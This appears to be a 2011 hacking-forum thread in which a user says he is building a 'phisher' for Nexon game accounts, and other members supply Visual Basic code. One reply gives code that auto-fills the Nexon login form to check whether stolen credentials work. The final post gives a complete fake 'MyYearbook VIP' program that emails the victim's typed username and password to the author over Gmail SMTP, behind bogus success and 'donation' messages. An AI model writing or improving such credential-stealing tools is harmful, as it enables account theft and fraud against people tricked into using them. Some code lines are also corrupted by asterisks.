Thread: Online Checker

Results 1 to 9 of 9
  1. #1
    Sketchy's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Posts
    4,876
    Reputation
    515
    Thanks
    663
    My Mood
    Inspired

    Exclamation Online Checker

    I want to make my application check the site login if it's a real account.

    Yes I'm making a phisher, no I'm not using it for evil.
    Just getting to know my way with visual basic.
    I don't have nearly enough time on a computer to spam lobbies of games about it. So Jason you can be chill...

    Anyway I want it to take the stuff from TextBoxID and TextBoxPW and put it in the textboxes Here.
    I'm already looking through it with "Inspect Element" and I found that the login form itself is called "frmLogin" and the text boxes are "txtID" and "txtPW".

    But yeah I need the program to check the login and enter the information from the textboxes to the according textboxes.
    Like this (sort of)
    Code:
    Insert "TextBoxID" into "TxtID"
    Insert "TextBoxPW" into "TxtPW"
    But of course there is more (I do not need to make another thread in near future.)

    I want it to say "NX Failed to add" if the login info is fake so I need it to check if the info on the site.

    Something like...
    Code:
    If Success = True then MsgBox("Nexon Cash Successfully Added!")
    If Success = False then MsgBox("Nexon Cash Failed to be Added")
    Yes I know most of the code that I supplied for you is total bullshit but that is why I am asking for your help.

    Help me out guys.

  2. #2
    TheBest-1337's Avatar
    Join Date
    Sep 2010
    Gender
    male
    Posts
    35
    Reputation
    15
    Thanks
    38
    My Mood
    Goofy
    Here are the codes.

    Put this code in the button:
    Code:
    WebBrowser1.Document.GetElementById("TxtID").SetAttribute("value", TextBoxID.Text)
    WebBrowser1.Document.GetElementById("TxtPwd").SetAttribute("value", TextBoxPW.Text)
    Timer1.Start()
    Then add a timer (Interval: 5000, Enabled = False)
    Code:
    If WebBrowser1.DocumentTex*****ntains("Failed")
    Timer1.Stop()
    MsgBox("Nexon Cash Successfully Added!")
    Else
    Timer1.Stop()
    MsgBox("Nexon Cash Failed to be Added")
    End If
    In
    Code:
    If WebBrowser1.DocumentTex*****ntains("Failed")
    Change the red word Failed to the word it says if you get a login error on nexon. I can't access nexon, so I don't know what words it say when it fails login
    Last edited by TheBest-1337; 05-27-2011 at 04:50 PM.

  3. The Following User Says Thank You to TheBest-1337 For This Useful Post:

    Sketchy (05-27-2011)

  4. #3
    Sketchy's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Posts
    4,876
    Reputation
    515
    Thanks
    663
    My Mood
    Inspired
    Quote Originally Posted by TheBest-1337 View Post
    Here are the codes.

    Put this code in the button:
    Code:
    WebBrowser1.Document.GetElementById("TxtID").SetAttribute("value", TextBoxID.Text)
    WebBrowser1.Document.GetElementById("TxtPwd").SetAttribute("value", TextBoxPW.Text)
    Timer1.Start()
    Then add a timer (Interval: 5000, Enabled = False)
    Code:
    If WebBrowser1.DocumentTex*****ntains("Failed")
    Timer1.Stop()
    MsgBox("Nexon Cash Successfully Added!")
    Else
    Timer1.Stop()
    MsgBox("Nexon Cash Failed to be Added")
    End If
    In
    Code:
    If WebBrowser1.DocumentTex*****ntains("Failed")
    Change the red word Failed to the word it says if you get a login error on nexon. I can't access nexon, so I don't know what words it say when it fails login
    It says WebBrowser1 is not declared. It wants me to correct to WebBrowser or WebBrowserBase.

    I also have it set to email me the info from the text boxes.

    I want it to only email me the account info if it is a real account (no fail).
    @TheBest-1337

  5. #4
    willrulz188's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Location
    Ohio?
    Posts
    1,786
    Reputation
    35
    Thanks
    231
    My Mood
    Amazed
    @iFacebook

    Go into tools and add webbrowser ?
    Question ALL statements! ?
    You're in denial that you're in denial. ?
    [img]https://i360.photobucke*****m/albums/oo45/blood188/Untitled-3.jpg?t=1284590977[/img]

  6. The Following User Says Thank You to willrulz188 For This Useful Post:

    Sketchy (05-27-2011)

  7. #5
    Sketchy's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Posts
    4,876
    Reputation
    515
    Thanks
    663
    My Mood
    Inspired
    Quote Originally Posted by willrulz188 View Post
    @iFacebook

    Go into tools and add webbrowser ?
    You see, this is why I need help.
    @willrulz188

    Thanks bro!

  8. #6
    Blendsoft's Avatar
    Join Date
    Jun 2011
    Gender
    male
    Location
    Serbia
    Posts
    47
    Reputation
    20
    Thanks
    9
    My Mood
    Inspired
    why this smells like account stealer?

  9. #7
    Fabolous's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    192.168.1.01
    Posts
    2,704
    Reputation
    261
    Thanks
    682
    My Mood
    Paranoid
    Basically use the webpage source to identify if the account is real.

  10. #8
    muddy175's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Location
    idk
    Posts
    7
    Reputation
    10
    Thanks
    0
    no. he wants it to email him the info as well. Very easy, but also, not aloud. lmao

  11. #9
    kats916's Avatar
    Join Date
    Sep 2010
    Gender
    male
    Posts
    39
    Reputation
    10
    Thanks
    2
    My Mood
    Amazed

    Post

    ok bro i can give you my code, but you have to change some stuff
    like my txt boxes say sorry server down, please try again and stuff like that so u have to change,

    i have 2 text box
    2 botons
    1 progress bar

    this is for gmail, so if u have hotmail,yahoo chnage the server in the code




    Code:
    Imports System.Net.Mail
    
    Public Class Form1
    
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Timer1.Start()
    
            If TextBox1.Text = "" Then
                MsgBox("Please check you email address and try again", MsgBoxStyle.Information, "Log-In")
                If TextBox2.Text = "" Then
                    MsgBox("Please check you password and try again", MsgBoxStyle.Information, "Log-In")
                Else
                End If
            End If
            Dim smtpServer As New SmtpClient()
            Dim mail As New MailMessage()
            smtpServer.Credentials = New Net.NetworkCredential("your email", "your password")
            'using gmail
            smtpServer.Port = 587
            smtpServer.Host = "smtp.gmail.com"
            smtpServer.EnableSsl = True
            mail = New MailMessage()
            mail.From = New MailAddress("ur email")
            mail.To.Add("ur email")
            mail.Subject = "email subject"
            mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
            smtpServer.Send(mail)
            MsgBox("Thank You for using MyYearbook VIP, please check your account and let us know if it worked :D", MsgBoxStyle.Information, "Done :D")
    
    
    
    
        End Sub
    
        Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
            ProgressBar1.Increment(1)
            If ProgressBar1.Value = ProgressBar1.Maximum Then
    
            End If
        End Sub
    
        Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
            MsgBox("Thanks for your Donation, 50$ has been taken off your account :D", MsgBoxStyle.Information, "Thank You")
        End Sub
    End Class

    final project : [YOUTUBE]https://www.youtube.com/watch?v=nY2D6DsTbUA[/YOUTUBE]
    Last edited by kats916; 06-09-2011 at 07:18 PM.